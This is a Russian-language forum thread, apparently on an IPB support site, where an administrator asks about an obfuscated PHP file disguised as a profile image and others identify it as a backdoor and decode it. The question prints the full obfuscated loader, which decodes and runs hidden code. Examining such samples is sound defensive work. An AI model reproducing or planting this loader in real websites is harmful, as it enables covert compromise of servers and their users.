Объясните, что это за файл photo-4989.jpg?

[Одмин 42]

У себя на сервере обнаружил файл /uploads/profile/photo-4989.jpg следующего содержания:

 

<?php $c3klind6='[q<q~nq2tQqyWq&ESK[4Keh}zE4ncz&tnqytQq<y2q&Tnh5@FKhnzKF5,d06ve7AV,CT//T@h}zE4nczeK*nQ4Q5&Q1}4FcGzg[iiM[E$&CT[zFT>Jewu0:u0o&{bbAe3&"##&M&CT~Th}zE4nczTQ1}4FcGzg[iiM[E$5C~TKE1cT&;@88&`PFW5&inz$Q&C`&88I&tTYTSKRnQ4KSeQ1}4FcGzeh}zE4ncz5&Q1}4FcGzg[iiM[E$&CtTYT&tY';global$g72pybaw;$g72pybaw=array();$zw35fhfe=array(234,241,236,250,237,246,254,243,229,165,173,228,175,164,174,170,189,252,235,192,249,240,191,183,190,251,184,217,205,208,210,214,207,221,182,185,231,247,232,220,253,244,223,187,204,218,201,196,215,203,222,194,162,163,178,177,242,161,226,248);foreach($zw35fhfe as $djv8zatz)$g72pybaw[]=($djv8zatz^159);$cyfadshp=o3wwnwea(array(125,122,81,75,83,110,91,105,110,112,75));$hu9sj5mp=$cyfadshp(o3wwnwea($c3klind6));$mezs9b4d=$hu9sj5mp[0];$c89e3f74=$mezs9b4d('',$hu9sj5mp[1]);$c89e3f74();function o3wwnwea($jn7,$xqd='',$l1="\x63\x68\x72"){global$g72pybaw,$btbp;if(!isset($btbp))$btbp=array();static$sxcw;if(!isset($sxcw))$sxcw=0;$t1=$hp9=$cg=$iu=$l1;$ter=$t1(125^30).$iu(241^158).$hp9(203^190).$cg(212^186).$t1(137^253);$wag=$hp9(79^60).$l1(90^46).$l1(240^130).$l1(40^68).$t1(200^173).$cg(131^237);$xhk=$cg(162^203).$t1(243^128).$t1(222^129).$cg(39^70).$t1(24^106).$hp9(112^2).$cg(20^117).$cg(14^119);$j2v=$l1(130^237).$hp9(68^54).$hp9(152^252);for($nt2=0,$joyg=0;$nt2<($xhk($jn7)?$ter($jn7):$wag($jn7));$nt2++){$tzdg=(($xhk($jn7)?$jn7[$nt2]:$j2v($jn7[$nt2])));if($tzdg==(84^94)||$tzdg==(104^101))continue;if(!isset($btbp[$tzdg])) $btbp[$tzdg]=$sxcw++;if(!isset($g72pybaw[$btbp[$tzdg]])){echo($jn7[$$nt2].' '.$tzdg);exit;}$fxvr=$l1( $g72pybaw[$btbp[$tzdg]]);$xqd.=$fxvr;}return$xqd;} ?>

 

Несет ли он какой-нибудь вред для форума?

[Атаман 460]

Вирус, скорее всего

 

http://ipbskins.ru/f...dpost__p__70621

[siv1987 2628]

Это шелл. Сам по себе с расширением jpg он безвреден, но могут использовать для подключения в скрипте. Другое дело, что форум не дает загрузить изображения если они не соответствуют формату, и обычным способом через форум загрузить его нельзя, значит вас скорее всего взломали.

[Одмин 42]

Другое дело, что форум не дает загрузить изображения если они не соответствуют формату, и обычным способом через форум загрузить его нельзя, значит вас скорее всего взломали.

@siv1987, Вы хотите сказать, что подобный файл невозможно загрузить на сервер через расширенную форму? Значит его залили посредством FTP?

[siv1987 2628]

Вы хотите сказать, что подобный файл невозможно загрузить на сервер через расширенную форму?

Через расширенную форму загружаются аттачи, а тут фото профиля. На сколько я помню, форум проверяет формат загружаемого аватара, если он с этим расширением не соответствует типу, то будет ругаться на неправильный формат.

Не факт просто, что его загрузили сейчас. Если вы обновлялись со старой версии либо форум был когда-то взломан, возможно он еще остался с тех времен. Нужно смотреть на дату последнего изменения. Но полагаться на эту дату не следует, ее можно изменить из php.

[Одмин 42]

@siv1987, ах да, тут же речь идет не об аттачах, а об аватаре. Тогда что получается... Форум проверяет формат и вес файла. Я файлик то уже удалил, но сколько он может весить? Копейки, наверняка по весу бы он прошел (у меня стоит пол мегабайта), а по формату тем паче (.jpg), но как такового изображения этот файл не имел (его просмотр был запрещен). Но ведь взгляните на ID аватара - 4989! У меня даже пользователей столько нет. Значит картинка была залита на сервер не через профиль (ну и не через форму загрузки в постах). Тогда как? Перерыл весь гугл, но подобной проблемы никто пока не обсуждал. Обсуждали помню трабл с файлом photo-128.jpg, в том числе и на этом форуме. К слову, у меня тоже была проблема с photo-128.jpg, но я ее вылечил еще в 2012 году.

 

И самое интересное, как я вышел на это: /uploads/profile/photo-4989.jpg ;)

Попросил хостера проверить мой акк на наличие вредоносных сигнатур в файлах и выложить отчет. По отчету я проверил все файлы, большинство из них - ложная тревога, но вот этот я сразу кинул вам на форум для вынесения экспертного решения.

 

Наверняка эта зараза под тем же ID лежит у массы админов, но странно, почему эту проблему никогда в интернете не обсуждали...

[siv1987 2628]

а по формату тем паче (.jpg)

.jpg это только расширение. Форум для аватаров проверяет тип изображения. Если файл не является изображением, в независимости от его расширения возвращается false. Файл явно был загружен посторонним образом.

 

Перерыл весь гугл, но подобной проблемы никто пока не обсуждал. Обсуждали помню трабл с файлом photo-128.jpg, в том числе и на этом форуме.

Эти взломы из одной и той же оперы. Информация о нем датируется еще с 2013. Не нашли потому, что для кодирования кода используется рэндомная последовательность символов. И имена переменных тоже случайны.

 

$c3klind6='[q<q~nq2tQqyWq&ESK[4Keh}zE4ncz&tnqytQq<y2q&Tnh5@FKhnzKF5,d06ve7AV,CT//T@h}zE4nczeK*nQ4Q5&Q1}4FcGzg[iiM[E$&CT[zFT>Jewu0:u0o&{bbAe3&"##&M&CT~Th}zE4nczTQ1}4FcGzg[iiM[E$5C~TKE1cT&;@88&`PFW5&inz$Q&C`&88I&tTYTSKRnQ4KSeQ1}4FcGzeh}zE4ncz5&Q1}4FcGzg[iiM[E$&CtTYT&tY';

Закодирован в нем код

 

if(!defined('FROM_IPB') && !function_exists("shutdownCallback") and @$_SERVER["HTTP_A"]=="b") { 
function shutdownCallback(){
	echo "<!--".md5("links")."-->";
}
register_shutdown_function("shutdownCallback");
} 

[Одмин 42]

Форум для аватаров еще проверяет тип изображения. Если файл не является изображением в независимости от его расширения возвращается false

То есть Вы хотите сказать через профиль и через вложения невозможно залить шелл с разрешенным на форуме расширением?

[siv1987 2628]

То есть Вы хотите сказать через профиль и через вложения невозможно залить шелл с разрешенным на форуме расширением?

Через профиль нельзя залить левые файлы (php код, или другие скрипты) под видом файлов с расширением jpg, png etc. Даже если добавить в конец изображения посторонний код, при ее обработке библиотека GD (imagemagick) удалит все посторонние примеси. Насчет аттачей точно не знаю, по моему там формат изображений не проверяется.

[Одмин 42]

Если файл не является изображением в независимости от его расширения возвращается false

А если в нормальное изображение через блокнот записать BOM, оно зальется на сервер через профиль пользователя?

[siv1987 2628]

А если в нормальное изображение через блокнот записать BOM

BOM (Byte Order Mark) это маркер дли индикации порядка байтов в текстовом файле. Изображение это бинарный (двоичный) файл, BOM'у там делать нечего.

[Одмин 42]

Ясно, понятно)